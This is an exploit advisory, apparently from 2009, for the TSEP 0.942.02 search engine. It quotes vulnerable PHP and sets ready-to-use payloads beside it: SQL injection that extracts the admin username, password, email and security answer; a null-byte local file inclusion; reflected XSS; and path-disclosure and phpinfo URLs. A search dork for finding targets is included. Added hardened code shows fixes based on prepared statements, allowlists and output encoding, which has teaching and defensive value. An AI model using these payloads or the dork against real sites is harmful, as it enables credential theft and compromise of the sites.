TSEP 0.942.02 SQL Injection / XSS / Disclosure

Posted Jun 30, 2009
Authored by eLwaux

TSEP versions 0.942.02 and below suffer from cross site scripting, remote SQL injection, and information disclosure vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, info disclosure
SHA-256 | ff98b70495f71363b1c8c71708949c2ac88c8a2f3e6fb69fc5bbe81a685eda90

TSEP <=0.942.02 Vulnerabilities
http://tsep.sourceforge.net

Dork: "powered by TSEP - The Search Engine Project"

(c)eLwaux 30.06.2009, uasc.org.ua


## ## ## ## ## ##

Blind SQL-Inj
/admin/rankform.php (lines 23-29)

-----------------------------------------------------------------------------
// Delete the contents
if ((isset ($_POST["delete"])) && (isset ($_POST["deleteRank"]))) {
    $percent = $_POST['deleteRank'];   // taken straight from the request, no validation or escaping
    $sql_del = "DELETE FROM $db_tablename WHERE valuepercent='$percent'";   // interpolated into the query

    mysql_query($sql_del);
}
-----------------------------------------------------------------------------

exploit 1 (blind SQL injection through the DELETE query):
POST: delete = .
POST: deleteRank = '{SQL}--

exploit 2 (blind SQL injection through the UPDATE query of the modify handler):
POST: modify = .
POST: modifyRank = .
POST: display = .
POST: comment = .
POST: alt = .
POST: percent = '{SQL}--




## ## ## ## ## ##

SQL-Inj
/admin/rankform.php (lines 54-69)

-----------------------------------------------------------------------------
if ((isset ($_POST["insert"])) && (isset ($_POST["insertNewRank"]))) {
    $alt = $_POST['alt'];                  // unescaped
    $image_show = $_POST['image_show'];    // unescaped
    $comment = $_POST['comment'];          // unescaped
    $percent = $_POST['percent'];
    $display = reslash($_POST['display']);

    if (($percent > "0") && ($percent <= "100")) {   // only $percent is range-checked
        $sql_ins = "INSERT INTO $db_tablename (alt_tag,display,valuepercent,image_show,comment)
                    VALUES ('$alt','$display','$percent','$image_show','$comment')";
        mysql_query($sql_ins);
    }
    $sql_upd = "UPDATE $db_tablename SET image_show='$image_show'";
    mysql_query($sql_upd);

}
-----------------------------------------------------------------------------

exploit:
POST: insertNewRank = .
POST: insert = .
POST: percent = 1
POST: alt = 1',( select concat_ws(0x3a,username,passwd,email,question,answer) from tsep_users ),1,1,1);--
POST: image_show = 1
POST: comment = 1
POST: display = 1
The subquery result is stored in the new rank row; then open /admin/rankform.php, where the stored values (admin username, password, email, security question and answer) are shown.
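A hardened version of the two rankform.php handlers above (the DELETE at lines 23-29 and the INSERT/UPDATE at lines 54-69), written for this edit and not TSEP's own code. It assumes a mysqli connection in $db and a trusted server-side table name in $db_tablename; every request value is range-validated or bound as a parameter, so the quote in the payloads above is stored as data instead of being parsed as SQL.

```php
<?php
// Added hardening example, not TSEP's own code. Assumes $db is a mysqli
// connection and $db_tablename a trusted, server-side table name.

// Validate a percent value as an integer in 1..100; null means reject.
function readPercent(array $post, string $key): ?int
{
    $v = filter_var($post[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    return $v === false ? null : $v;
}

// Delete the contents: the value travels as a bound parameter, so a quote
// in deleteRank never reaches the SQL parser (and fails validation anyway).
if (isset($_POST['delete'], $_POST['deleteRank'])) {
    $percent = readPercent($_POST, 'deleteRank');
    if ($percent !== null) {
        $stmt = $db->prepare("DELETE FROM `$db_tablename` WHERE valuepercent = ?");
        $stmt->bind_param('i', $percent);
        $stmt->execute();
        $stmt->close();
    }
}

// Insert a new rank: every column value is bound, so an alt value such as
// 1',(select ...),1,1,1);--  is stored as a literal string.
if (isset($_POST['insert'], $_POST['insertNewRank'])) {
    $alt       = (string)($_POST['alt'] ?? '');
    $display   = (string)($_POST['display'] ?? '');
    $imageShow = (string)($_POST['image_show'] ?? '');
    $comment   = (string)($_POST['comment'] ?? '');
    $percent   = readPercent($_POST, 'percent');
    if ($percent !== null) {
        $stmt = $db->prepare("INSERT INTO `$db_tablename`
            (alt_tag, display, valuepercent, image_show, comment)
            VALUES (?, ?, ?, ?, ?)");
        $stmt->bind_param('ssiss', $alt, $display, $percent, $imageShow, $comment);
        $stmt->execute();
        $stmt->close();
    }
    // The original also updates image_show on every row; keep that, but bound.
    $stmt = $db->prepare("UPDATE `$db_tablename` SET image_show = ?");
    $stmt->bind_param('s', $imageShow);
    $stmt->execute();
    $stmt->close();
}
```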



## ## ## ## ## ##

LFI
/admin/index.php (lines 335-345)

-----------------------------------------------------------------------------
if ( isset( $_POST ) and count( $_POST ) > 0 ) {
    $_GET = $_POST;                      // any POST body replaces $_GET wholesale
}
if ( !isset($_GET["lang"]) )
    if ( !isset($_SESSION["lang"]) )
        $_GET["lang"] = "en_US";
    else
        $_GET["lang"] = $_SESSION["lang"];
if ( $_GET["lang"] != "en_US" )
    require_once( "../language/" . $_GET["lang"] . "/language.php" );   // request value used as a path component
-----------------------------------------------------------------------------

exploit:
GET: /admin/?lang=../{FILE.PHP}%00
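A replacement for the require_once above, added for this edit and not TSEP's own code. The %00 in the request only truncates the appended /language.php on PHP releases before 5.3.4 (later releases reject paths containing a NUL byte), so the fix below does not rely on the PHP version: it allowlists the language code by pattern and then checks that the resolved file still lies inside the language directory. Assumed: the language directory is ../language relative to the admin script.

```php
<?php
// Added hardening example, not TSEP's code. Replaces the require_once of
// "../language/" . $_GET["lang"] . "/language.php" in admin/index.php.

// Return the language file to include, or null. Two independent checks:
//  1. the value must look like en_US (no '/', '.', or NUL possible);
//  2. the resolved path must stay below the resolved language root.
function resolveLanguageFile(string $lang, string $langRoot): ?string
{
    if (!preg_match('/\A[a-z]{2}_[A-Z]{2}\z/', $lang)) {
        return null;                    // rejects ../x%00, ../../etc, and so on
    }
    $root = realpath($langRoot);
    $file = realpath($langRoot . '/' . $lang . '/language.php');
    if ($root === false || $file === false) {
        return null;                    // unknown language or missing file
    }
    // Containment check: the file must sit under "<root>/".
    if (strncmp($file, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Do not copy $_POST over $_GET as the original does; read the one key needed.
$lang = $_GET['lang'] ?? $_POST['lang'] ?? $_SESSION['lang'] ?? 'en_US';

if ($lang !== 'en_US') {
    $file = resolveLanguageFile($lang, __DIR__ . '/../language');
    if ($file === null) {
        $lang = 'en_US';                // fall back to the default, include nothing
    } else {
        require_once $file;
    }
}
```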





## ## ## ## ## ##

Blind SQL-inj
/admin/indexoverview.php (lines 29-36)

-----------------------------------------------------------------------------
if (isset($_GET['order'])) // for userdefined search order, otherwise sort by time of entry: Title ASC
{ // write new values
    $db_tablename = $db_table_prefix."internal";
    $query = "UPDATE $db_tablename SET stringvalue='".$_GET['order']."' WHERE description='tsepindexovervieworder'";   // order concatenated unescaped
    $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());                                          // error text reaches the response
    $query = "UPDATE $db_tablename SET stringvalue='".$_GET['dir']."' WHERE description='tsepindexoverviewdirection'";  // dir concatenated unescaped
    $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
}
-----------------------------------------------------------------------------

exploit:
GET: order = '+and+1=if(select+ascii(lower(substring(passwd,1,1)))>90+from+tsep_users+where+username='adminame',1,0)--
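A hardened version of the indexoverview.php handler above, added for this edit and not TSEP's code. Because order and dir are later used as a sort column and direction, the values are mapped onto an allowlist rather than escaped, and the two UPDATEs run as one prepared statement. Assumed: a mysqli connection in $db, the configured prefix in $db_table_prefix, and the column names in ORDER_COLUMNS (the page only shows that Title is one of them).

```php
<?php
// Added hardening example, not TSEP's code. Assumes $db is a mysqli
// connection and $db_table_prefix the configured table prefix.

// Only these values are meaningful as a sort column / direction, so the
// request value is matched against an allowlist instead of being escaped.
const ORDER_COLUMNS = ['title', 'url', 'lastindexed'];  // assumed column names
const ORDER_DIRS    = ['ASC', 'DESC'];

function pickOrder(?string $v): ?string
{
    $v = strtolower((string)$v);
    return in_array($v, ORDER_COLUMNS, true) ? $v : null;
}

function pickDir(?string $v): ?string
{
    $v = strtoupper((string)$v);
    return in_array($v, ORDER_DIRS, true) ? $v : null;
}

if (isset($_GET['order'])) {
    $order = pickOrder($_GET['order']);
    $dir   = pickDir($_GET['dir'] ?? 'ASC');
    if ($order !== null && $dir !== null) {
        $tbl  = $db_table_prefix . 'internal';
        $stmt = $db->prepare("UPDATE `$tbl` SET stringvalue = ? WHERE description = ?");
        $settings = [
            'tsepindexovervieworder'     => $order,
            'tsepindexoverviewdirection' => $dir,
        ];
        foreach ($settings as $key => $val) {
            $stmt->bind_param('ss', $val, $key);
            $stmt->execute();           // no die(mysql_error()): log failures server-side instead
        }
        $stmt->close();
    }
}
```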





## ## ## ## ## ##

XSS
/admin/configuration.php (lines 137, 154, 164)

-----------------------------------------------------------------------------
<!-- PHP_SELF reflects the request path, including any PATH_INFO, without encoding -->
<form name="tsepconfig" id="tsepconfig" method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
<form name="frmMaxResultNew" id="frmMaxResultNew" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
<form name="frmMaxR....ckForm" id="frmMaxResult" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
-----------------------------------------------------------------------------

exploit:
GET: /configuration.php/"><script>alert(/xss/);</script><a%20"



## ## ## ## ## ##

XSS
/admin/index.php (lines 97-108)

-----------------------------------------------------------------------------
if ( isset( $_GET["errorMsg"] ) ) {
    $html .= " <td class=\"errorMessage\">".addslashes( $_GET["errorMsg"] )."</td>\n";   // addslashes() is not HTML encoding
    unset( $_GET["errorMsg"] );
}
-----------------------------------------------------------------------------

exploit:
GET: /admin/?errorMsg=<script>alert(/xss/);</script>
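One output-encoding fix for both XSS findings above (the PHP_SELF form actions in configuration.php and the errorMsg cell in index.php), added for this edit and not TSEP's code. addslashes() only escapes quotes and backslashes, so a script tag passes through untouched; the HTML text and attribute contexts need htmlspecialchars(), and the form action should come from SCRIPT_NAME, which (unlike PHP_SELF) does not carry PATH_INFO. The function names h(), renderErrorCell() and formAction() are this example's own.

```php
<?php
// Added hardening example, not TSEP's code. Covers both XSS findings:
// the reflected errorMsg in admin/index.php and the unencoded PHP_SELF in
// the admin/configuration.php form actions.

// One output-encoding helper for HTML text and double-quoted attributes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// index.php: encode for HTML instead of addslashes(); "<script>" becomes
// "&lt;script&gt;" and is rendered as text, not executed.
function renderErrorCell(?string $msg): string
{
    if ($msg === null || $msg === '') {
        return '';
    }
    return " <td class=\"errorMessage\">" . h($msg) . "</td>\n";
}

// configuration.php: PHP_SELF reflects the request path, so a request for
// /configuration.php/"><script>... ends up inside the attribute. SCRIPT_NAME
// stops at the script itself; encode it anyway for the attribute context.
function formAction(): string
{
    return h(basename($_SERVER['SCRIPT_NAME'] ?? 'configuration.php'));
}

// Usage at the two original sites:
$html = renderErrorCell($_GET['errorMsg'] ?? null);
echo '<form name="tsepconfig" id="tsepconfig" method="post" action="' . formAction() . '">';
```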




## ## ## ## ## ##

Path disclosure (requesting these include files directly):
-----------------------------------------------------------------------------
/admin/examples/phpcrawl4tsep.php
/admin/examples/fillwithcontent.php
/admin/examples/urllist.php
/include/indexingtimetaken.php
/include/timeneeded.php
/include/colorcycle.php
/include/dbconnection.php
/include/resultnumber.php
/include/copyright.php
/include/notifyofstopwords.php
/inclued/oldmysqltell.php
/include/indexstatus.php
/include/pagenavigation.php
/include/searchterm.php
/include/stampittimestamp.php
/include/ranking.php
/include/ipfunctions.php
/include/indexer_search_table.php
/include/printpagedetails.php
/include/deletefile.php
/include/uploadfile.php
/include/configfunctions.php
-----------------------------------------------------------------------------





## ## ## ## ## ##

PHPINFO:
-----------------------------------------------------------------------------
/admin/tsepinfo.php
-----------------------------------------------------------------------------




## ## ## ## ## ##

Other exploits:
/admin/configcontentimages.php/">{XSS}<"
/include/indexer_search_table.php?tsep_lng[help_copyright]=">{XSS}<"
/tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a"
/tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10

